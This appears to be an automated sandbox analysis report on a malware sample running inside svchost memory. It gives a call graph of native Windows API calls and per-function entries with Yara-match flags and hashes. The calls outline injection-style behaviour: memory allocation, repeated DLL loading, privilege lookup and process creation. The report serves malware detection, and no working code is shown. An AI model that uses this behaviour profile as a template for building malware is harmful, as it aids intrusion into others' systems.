34730 239af20 LdrLoadDll 34729->34730 34731 2394d04 34730->34731 34732 239a2e0 LdrLoadDll 34731->34732 34732->34635 34734 239af20 LdrLoadDll 34733->34734 34735 239a46c NtClose 34734->34735 34735->34640 34736->34620 34737->34684 34751 239a5f0 34738->34751 34740 239bf68 34740->34713 34742 239af20 LdrLoadDll 34741->34742 34743 239a3ec NtReadFile 34742->34743 34743->34712 34745 239bb5d 34744->34745 34746 239bb74 34744->34746 34745->34746 34747 239bf50 2 API calls 34745->34747 34746->34724 34748 239bb8b 34747->34748 34748->34724 34749->34714 34750->34701 34752 239af20 LdrLoadDll 34751->34752 34753 239a60c RtlAllocateHeap 34752->34753 34753->34740 34755 239bd2d 34754->34755 34884 239a500 34754->34884 34755->34645 34758 2394071 34757->34758 34759 2394079 34757->34759 34758->34648 34760 239434c 34759->34760 34887 239cef0 34759->34887 34760->34648 34762 23940cd 34763 239cef0 2 API calls 34762->34763 34767 23940d8 34763->34767 34764 2394126 34766 239cef0 2 API calls 34764->34766 34770 239413a 34766->34770 34767->34764 34895 239cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 34767->34895 34896 239d020 34767->34896 34769 2394197 34771 239cef0 2 API calls 34769->34771 34770->34769 34773 239d020 3 API calls 34770->34773 34772 23941ad 34771->34772 34774 23941ea 34772->34774 34776 239d020 3 API calls 34772->34776 34773->34770 34775 239cef0 2 API calls 34774->34775 34777 23941f5 34775->34777 34776->34772 34778 239d020 3 API calls 34777->34778 34784 239422f 34777->34784 34778->34777 34781 239cf50 2 API calls 34782 239432e 34781->34782 34783 239cf50 2 API calls 34782->34783 34785 2394338 34783->34785 34892 239cf50 34784->34892 34786 239cf50 2 API calls 34785->34786 34787 2394342 34786->34787 34788 239cf50 2 API calls 34787->34788 34788->34760 34790 2395391 34789->34790 34791 2394a40 8 API calls 34790->34791 34793 23953a7 34791->34793 34792 23953fa 34792->34652 34793->34792 34794 23953e2 34793->34794 34795 23953f5 34793->34795 34796 239bd80 2 API calls 34794->34796 34797 239bd80 2 API calls 34795->34797 34798 23953e7 34796->34798 34797->34792 34798->34652 34902 239abf0 34799->34902 34802 239abf0 LdrLoadDll 34803 239ad4d 34802->34803 34804 239abf0 LdrLoadDll 34803->34804 34805 239ad56 34804->34805 34806 239abf0 LdrLoadDll 34805->34806 34807 239ad5f 34806->34807 34808 239abf0 LdrLoadDll 34807->34808 34809 239ad68 34808->34809 34810 239abf0 LdrLoadDll 34809->34810 34811 239ad71 34810->34811 34812 239abf0 LdrLoadDll 34811->34812 34813 239ad7d 34812->34813 34814 239abf0 LdrLoadDll 34813->34814 34815 239ad86 34814->34815 34816 239abf0 LdrLoadDll 34815->34816 34817 239ad8f 34816->34817 34818 239abf0 LdrLoadDll 34817->34818 34819 239ad98 34818->34819 34820 239abf0 LdrLoadDll 34819->34820 34821 239ada1 34820->34821 34822 239abf0 LdrLoadDll 34821->34822 34823 239adaa 34822->34823 34824 239abf0 LdrLoadDll 34823->34824 34825 239adb6 34824->34825 34826 239abf0 LdrLoadDll 34825->34826 34827 239adbf 34826->34827 34828 239abf0 LdrLoadDll 34827->34828 34829 239adc8 34828->34829 34830 239abf0 LdrLoadDll 34829->34830 34831 239add1 34830->34831 34832 239abf0 LdrLoadDll 34831->34832 34833 239adda 34832->34833 34834 239abf0 LdrLoadDll 34833->34834 34835 239ade3 34834->34835 34836 239abf0 LdrLoadDll 34835->34836 34837 239adef 34836->34837 34838 239abf0 LdrLoadDll 34837->34838 34839 239adf8 34838->34839 34840 239abf0 LdrLoadDll 34839->34840 34841 239ae01 34840->34841 34842 239abf0 LdrLoadDll 34841->34842 34843 239ae0a 34842->34843 34844 239abf0 LdrLoadDll 34843->34844 34845 239ae13 34844->34845 34846 239abf0 LdrLoadDll 34845->34846 34847 239ae1c 34846->34847 34848 239abf0 LdrLoadDll 34847->34848 34849 239ae28 34848->34849 34850 239abf0 LdrLoadDll 34849->34850 34851 239ae31 34850->34851 34852 239abf0 LdrLoadDll 34851->34852 34853 239ae3a 34852->34853 34854 239abf0 LdrLoadDll 34853->34854 34855 239ae43 34854->34855 34856 239abf0 LdrLoadDll 34855->34856 34857 239ae4c 34856->34857 34858 239abf0 LdrLoadDll 34857->34858 34859 239ae55 34858->34859 34860 239abf0 LdrLoadDll 34859->34860 34861 239ae61 34860->34861 34862 239abf0 LdrLoadDll 34861->34862 34863 239ae6a 34862->34863 34864 239abf0 LdrLoadDll 34863->34864 34865 239ae73 34864->34865 34866 239abf0 LdrLoadDll 34865->34866 34867 239ae7c 34866->34867 34868 239abf0 LdrLoadDll 34867->34868 34869 239ae85 34868->34869 34870 239abf0 LdrLoadDll 34869->34870 34871 239ae8e 34870->34871 34872 239abf0 LdrLoadDll 34871->34872 34873 239ae9a 34872->34873 34874 239abf0 LdrLoadDll 34873->34874 34875 239aea3 34874->34875 34876 239abf0 LdrLoadDll 34875->34876 34877 239aeac 34876->34877 34877->34656 34879 239af20 LdrLoadDll 34878->34879 34880 2399e9c 34879->34880 34908 3069860 LdrInitializeThunk 34880->34908 34881 2399eb3 34881->34577 34883->34653 34885 239a51c NtAllocateVirtualMemory 34884->34885 34886 239af20 LdrLoadDll 34884->34886 34885->34755 34886->34885 34888 239cf00 34887->34888 34889 239cf06 34887->34889 34888->34762 34890 239bf50 2 API calls 34889->34890 34891 239cf2c 34890->34891 34891->34762 34893 239bd80 2 API calls 34892->34893 34894 2394324 34893->34894 34894->34781 34895->34767 34897 239cf90 34896->34897 34898 239bf50 2 API calls 34897->34898 34899 239cfed 34897->34899 34900 239cfca 34898->34900 34899->34767 34900->34899 34901 239bd80 2 API calls 34900->34901 34901->34899 34903 239ac0b 34902->34903 34904 2394e40 LdrLoadDll 34903->34904 34905 239ac2b 34904->34905 34906 2394e40 LdrLoadDll 34905->34906 34907 239acd7 34905->34907 34906->34907 34907->34802 34908->34881 34910 3069681 34909->34910 34911 306968f LdrInitializeThunk 34909->34911 34910->34662 34911->34662 34913 239af20 LdrLoadDll 34912->34913 34914 239a64c RtlFreeHeap 34913->34914 34914->34666 34916 2387eab 34915->34916 34917 2387eb0 34915->34917 34916->34585 34918 239bd00 2 API calls 34917->34918 34924 2387ed5 34918->34924 34919 2387f38 34919->34585 34920 2399e80 2 API calls 34920->34924 34921 2387f3e 34923 2387f64 34921->34923 34925 239a580 2 API calls 34921->34925 34923->34585 34924->34919 34924->34920 34924->34921 34927 239bd00 2 API calls 34924->34927 34931 239a580 34924->34931 34926 2387f55 34925->34926 34926->34585 34927->34924 34929 239a580 2 API calls 34928->34929 34930 238817e 34929->34930 34930->34542 34932 239af20 LdrLoadDll 34931->34932 34933 239a59c 34932->34933 34936 30696e0 LdrInitializeThunk 34933->34936 34934 239a5b3 34934->34924 34936->34934 34938 239b583 34937->34938 34941 238ace0 34938->34941 34942 238ad04 34941->34942 34943 238ad40 LdrLoadDll 34942->34943 34944 2389c3a 34942->34944 34943->34944 34944->34548 34946 238b053 34945->34946 34948 238b0d0 34946->34948 34961 2399c50 LdrLoadDll 34946->34961 34948->34555 34950 239af20 LdrLoadDll 34949->34950 34951 238f1ab 34950->34951 34951->34558 34952 239a790 34951->34952 34953 239af20 LdrLoadDll 34952->34953 34954 239a7af LookupPrivilegeValueW 34953->34954 34954->34560 34957 239af20 LdrLoadDll 34956->34957 34958 239a23c 34957->34958 34962 3069910 LdrInitializeThunk 34958->34962 34959 239a25b 34959->34561 34961->34948 34962->34959 34964 238b1e0 34963->34964 34965 238b030 LdrLoadDll 34964->34965 34966 238b1f4 34965->34966 34966->34494 34968 238af24 34967->34968 35040 2399c50 LdrLoadDll 34968->35040 34970 238af5e 34970->34496 34972 238f39c 34971->34972 34973 238b1b0 LdrLoadDll 34972->34973 34974 238f3ae 34973->34974 35041 238f280 34974->35041 34977 238f3c9 34979 238f3d4 34977->34979 34980 239a450 2 API calls 34977->34980 34978 238f3e1 34981 239a450 2 API calls 34978->34981 34982 238f3f2 34978->34982 34979->34499 34980->34979 34981->34982 34982->34499 34984 238f42c 34983->34984 35060 238b2a0 34984->35060 34986 238f43e 34987 238f280 3 API calls 34986->34987 34988 238f44f 34987->34988 34989 238f459 34988->34989 34990 238f471 34988->34990 34991 238f464 34989->34991 34993 239a450 2 API calls 34989->34993 34992 238f482 34990->34992 34994 239a450 2 API calls 34990->34994 34991->34501 34992->34501 34993->34991 34994->34992 34996 238ca96 34995->34996 34997 238caa0 34995->34997 34996->34510 34998 238af00 LdrLoadDll 34997->34998 34999 238cb3e 34998->34999 35000 238cb64 34999->35000 35001 238b030 LdrLoadDll 34999->35001 35000->34510 35002 238cb80 35001->35002 35003 2394a40 8 API calls 35002->35003 35004 238cbd5 35003->35004 35004->34510 35006 238d636 35005->35006 35007 238b030 LdrLoadDll 35006->35007 35008 238d64a 35007->35008 35064 238d300 35008->35064 35010 238908b 35011 238cbf0 35010->35011 35012 238cc16 35011->35012 35013 238b030 LdrLoadDll 35012->35013 35014 238cc99 35012->35014 35013->35014 35015 238b030 LdrLoadDll 35014->35015 35016 238cd06 35015->35016 35017 238af00 LdrLoadDll 35016->35017 35018 238cd6f 35017->35018 35019 238b030 LdrLoadDll 35018->35019 35020 238ce1f 35019->35020 35020->34523 35023 2388d14 35021->35023 35093 238f6c0 35021->35093 35035 2388f25 35023->35035 35098 2394390 35023->35098 35025 2388d70 35025->35035 35101 2388ab0 35025->35101 35028 239cef0 2 API calls 35029 2388db2 35028->35029 35030 239d020 3 API calls 35029->35030 35031 2388dc7 35030->35031 35032 2387ea0 4 API calls 35031->35032 35031->35035 35036 2388160 2 API calls 35031->35036 35037 238c7a0 18 API calls 35031->35037 35106 238f660 35031->35106 35110 238f070 21 API calls 35031->35110 35032->35031 35035->34479 35036->35031 35037->35031 35038->34502 35039->34520 35040->34970 35042 238f29a 35041->35042 35050 238f350 35041->35050 35043 238b030 LdrLoadDll 35042->35043 35044 238f2bc 35043->35044 35051 2399f00 35044->35051 35046 238f2fe 35054 2399f40 35046->35054 35049 239a450 2 API calls 35049->35050 35050->34977 35050->34978 35052 239af20 LdrLoadDll 35051->35052 35053 2399f1c 35052->35053 35053->35046 35055 2399f5c 35054->35055 35056 239af20 LdrLoadDll 35054->35056 35059 3069fe0 LdrInitializeThunk 35055->35059 35056->35055 35057 238f344 35057->35049 35059->35057 35061 238b2c7 35060->35061 35062 238b030 LdrLoadDll 35061->35062 35063 238b303 35062->35063 35063->34986 35065 238d317 35064->35065 35073 238f700 35065->35073 35069 238d38b 35070 238d392 35069->35070 35084 239a260 LdrLoadDll 35069->35084 35070->35010 35072 238d3a5 35072->35010 35074 238f725 35073->35074 35085 23881a0 35074->35085 35076 238d35f 35081 239a6a0 35076->35081 35077 2394a40 8 API calls 35079 238f749 35077->35079 35079->35076 35079->35077 35080 239bd80 2 API calls 35079->35080 35092 238f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 35079->35092 35080->35079 35082 239af20 LdrLoadDll 35081->35082 35083 239a6bf CreateProcessInternalW 35082->35083 35083->35069 35084->35072 35086 238829f 35085->35086 35087 23881b5 35085->35087 35086->35079 35087->35086 35088 2394a40 8 API calls 35087->35088 35089 2388222 35088->35089 35090 239bd80 2 API calls 35089->35090 35091 2388249 35089->35091 35090->35091 35091->35079 35092->35079 35094 238f6df 35093->35094 35095 2394e40 LdrLoadDll 35093->35095 35096 238f6ed 35094->35096 35097 238f6e6 SetErrorMode 35094->35097 35095->35094 35096->35023 35097->35096 35111 238f490 35098->35111 35100 23943b6 35100->35025 35102 239bd00 2 API calls 35101->35102 35103 2388ad5 35102->35103 35104 2388cea 35103->35104 35131 2399840 35103->35131 35104->35028 35107 238f673 35106->35107 35179 2399e50 35107->35179 35110->35031 35112 238f4ad 35111->35112 35118 2399f80 35112->35118 35115 238f4f5 35115->35100 35119 2399f9c 35118->35119 35120 239af20 LdrLoadDll 35118->35120 35129 30699a0 LdrInitializeThunk 35119->35129 35120->35119 35121 238f4ee 35121->35115 35123 2399fd0 35121->35123 35124 2399fd6 35123->35124 35125 239af20 LdrLoadDll 35124->35125 35126 2399fec 35125->35126 35130 3069780 LdrInitializeThunk 35126->35130 35127 238f51e 35127->35100 35129->35121 35130->35127 35132 239bf50 2 API calls 35131->35132 35133 2399857 35132->35133 35152 2389310 35133->35152 35135 2399872 35136 2399899 35135->35136 35137 23998b0 35135->35137 35138 239bd80 2 API calls 35136->35138 35140 239bd00 2 API calls 35137->35140 35139 23998a6 35138->35139 35139->35104 35141 23998ea 35140->35141 35142 239bd00 2 API calls 35141->35142 35143 2399903 35142->35143 35149 2399ba4 35143->35149 35158 239bd40 LdrLoadDll 35143->35158 35145 2399b89 35146 2399b90 35145->35146 35145->35149 35147 239bd80 2 API calls 35146->35147 35148 2399b9a 35147->35148 35148->35104 35150 239bd80 2 API calls 35149->35150 35151 2399bf9 35150->35151 35151->35104 35153 2389335 35152->35153 35154 238ace0 LdrLoadDll 35153->35154 35155 2389368 35154->35155 35157 238938d 35155->35157 35159 238cf10 35155->35159 35157->35135 35158->35145 35160 238cf3c 35159->35160 35161 239a1a0 LdrLoadDll 35160->35161 35162 238cf55 35161->35162 35163 238cf5c 35162->35163 35170 239a1e0 35162->35170 35163->35157 35167 238cf97 35168 239a450 2 API calls 35167->35168 35169 238cfba 35168->35169 35169->35157 35171 239af20 LdrLoadDll 35170->35171 35172 239a1fc 35171->35172 35178 3069710 LdrInitializeThunk 35172->35178 35173 238cf7f 35173->35163 35175 239a7d0 35173->35175 35176 239af20 LdrLoadDll 35175->35176 35177 239a7ef 35176->35177 35177->35167 35178->35173 35180 239af20 LdrLoadDll 35179->35180 35181 2399e6c 35180->35181 35184 3069840 LdrInitializeThunk 35181->35184 35182 238f69e 35182->35031 35184->35182 35185 3069540 LdrInitializeThunk 35189 2399040 35190 239bd00 2 API calls 35189->35190 35192 239907b 35189->35192 35190->35192 35191 239915c 35192->35191 35193 238ace0 LdrLoadDll 35192->35193 35194 23990b1 35193->35194 35195 2394e40 LdrLoadDll 35194->35195 35197 23990cd 35195->35197 35196 23990e0 Sleep 35196->35197 35197->35191 35197->35196 35200 2398c60 LdrLoadDll 35197->35200 35201 2398e70 LdrLoadDll 35197->35201 35200->35197 35201->35197

                        Executed Functions

                        Function 0239A320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 289 239a320-239a371 call 239af20 NtCreateFile
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02394BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02394BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0239A36D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction ID: 1faba55e7a706caa1e36e6ecd8d408dc17f06807de19b4596b02362565802789
                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction Fuzzy Hash: 66F0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A31F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 292 239a31f-239a336 293 239a33c-239a371 NtCreateFile 292->293 294 239a337 call 239af20 292->294 294->293
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02394BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02394BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0239A36D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: 3b77060bc8c2cf7482738aebf48b3f28276a9a3f2242f01aa477d2a88d8d6111
                        • Instruction ID: 5eb20d7995e11f4d36e7ef708f56325256c252feabd29b5b74b398c2c42d0cae
                        • Opcode Fuzzy Hash: 3b77060bc8c2cf7482738aebf48b3f28276a9a3f2242f01aa477d2a88d8d6111
                        • Instruction Fuzzy Hash: 46F0E2B2214149ABCB08CF98DC84CEB77ADFF8C354B15864DFA1D93202D634E8518BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A3CE Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtReadFile.NTDLL(02394D62,5EB65239,FFFFFFFF,02394A21,?,?,02394D62,?,02394A21,FFFFFFFF,5EB65239,02394D62,?,00000000), ref: 0239A415
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 81dc91db910f46d2b9c8c6668600b28b44de23b09c9a3b6224f470350e5bbe35
                        • Instruction ID: 86df9f2665f13b7c4c51281cebc567e1883bbf71a57100c637e23ee8aceed393
                        • Opcode Fuzzy Hash: 81dc91db910f46d2b9c8c6668600b28b44de23b09c9a3b6224f470350e5bbe35
                        • Instruction Fuzzy Hash: 99F0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158648BE1DA7251D634E9518BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtReadFile.NTDLL(02394D62,5EB65239,FFFFFFFF,02394A21,?,?,02394D62,?,02394A21,FFFFFFFF,5EB65239,02394D62,?,00000000), ref: 0239A415
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction ID: cb959aebdf63923acd9629abcee283676129e18d704d4a7231004f47e99fce54
                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction Fuzzy Hash: 88F0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A4FB Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02382D11,00002000,00003000,00000004), ref: 0239A539
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 6d8f00abf55874cd849e874c910542dbf7b590782950aeed96e44bb9d75d0d0d
                        • Instruction ID: 1e660370fa5bf4097031ce20e3aad3f2d3729b2582f9f1afa51184e9e2c2853d
                        • Opcode Fuzzy Hash: 6d8f00abf55874cd849e874c910542dbf7b590782950aeed96e44bb9d75d0d0d
                        • Instruction Fuzzy Hash: CDF0F8B2210218ABCB14DF89DC80EAB77ADAF8C754F118258BE1997281C630E911CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02382D11,00002000,00003000,00000004), ref: 0239A539
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction ID: 8985f31464cba052e8d04f1c1a4d55f218dc08c0f3b8f0e0644d7fe649b93511
                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction Fuzzy Hash: B4F015B2200208ABCB14DF89DC80EAB77ADAF88754F118248BE0997241C630F810CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0239A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtClose.NTDLL(02394D40,?,?,02394D40,00000000,FFFFFFFF), ref: 0239A475
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction ID: ce07d04665c10abe001aa1f8b0be1f4b0f375e0df7f22af687c46e08035a5988
                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction Fuzzy Hash: F9D01776200314ABDB20EB98DC85FA77BADEF48760F154599BA199B242C530FA008AE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f06ef6a9aa02312e982febf64722849f42513be5c7d429c133464aa72efb628d
                        • Instruction ID: cb9606d317c7b2ed077c9eafdf11a60e7b072c6969446f7327b652ff95c4cfcc
                        • Opcode Fuzzy Hash: f06ef6a9aa02312e982febf64722849f42513be5c7d429c133464aa72efb628d
                        • Instruction Fuzzy Hash: FB90026161284542E200A5698C14B0701459BD0343F51C115A0145554CCA5588616565
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e06d08ac0d2db6548b086b7a178b96f0320047f4c472817da166fbce30044e01
                        • Instruction ID: 0c72239f00c5b5cddf6f92772bb4cbc3611d470c385fda892accd789078f7124
                        • Opcode Fuzzy Hash: e06d08ac0d2db6548b086b7a178b96f0320047f4c472817da166fbce30044e01
                        • Instruction Fuzzy Hash: E79002B160204902E140B159840474601459BD0341F51C011A5055554E87998DD576A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 8cc742db304af8d696fad0862f5f0d794eaae2a3a7a7f63aa3c6bdc83ba7d9d0
                        • Instruction ID: 09c6d0c8a59c5547334d5887fcd282e59a0ba1886779baa45ecea3a149614a8a
                        • Opcode Fuzzy Hash: 8cc742db304af8d696fad0862f5f0d794eaae2a3a7a7f63aa3c6bdc83ba7d9d0
                        • Instruction Fuzzy Hash: 609002A174204942E100A1598414B060145DBE1341F51C015E1055554D8759CC52716A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: fe01a0416b0a1355d301f30a04e1a224f710542c2e012a726f0a7936a90c2a81
                        • Instruction ID: 176b7d4d7db6e0e621624db3493bbb031dd1bc490073bb22a5b69f791b330535
                        • Opcode Fuzzy Hash: fe01a0416b0a1355d301f30a04e1a224f710542c2e012a726f0a7936a90c2a81
                        • Instruction Fuzzy Hash: CD900261643086526545F15984045074146ABE0281791C012A1405950C86669856E665
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b1bc2197557e0b72e87347839c436ad3faf2239f1d5233d37046fbad463c808c
                        • Instruction ID: 4455f49b624f55cb1064d975b3e7720de2db2b546fa4192d9b9973f1ff6a1027
                        • Opcode Fuzzy Hash: b1bc2197557e0b72e87347839c436ad3faf2239f1d5233d37046fbad463c808c
                        • Instruction Fuzzy Hash: B890027160204913E111A159850470701499BD0281F91C412A0415558D97968952B165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7ecfdd20874192f78092f368c7bcdaec98d682d0a470d083fca9ce5d6c50405e
                        • Instruction ID: e6eba16675c5276c90be2b58b6acf0c0f9d68227e1bb9d9f56003273937f5337
                        • Opcode Fuzzy Hash: 7ecfdd20874192f78092f368c7bcdaec98d682d0a470d083fca9ce5d6c50405e
                        • Instruction Fuzzy Hash: 7A90027160204902E100A599940864601459BE0341F51D011A5015555EC7A588917175
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03069780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
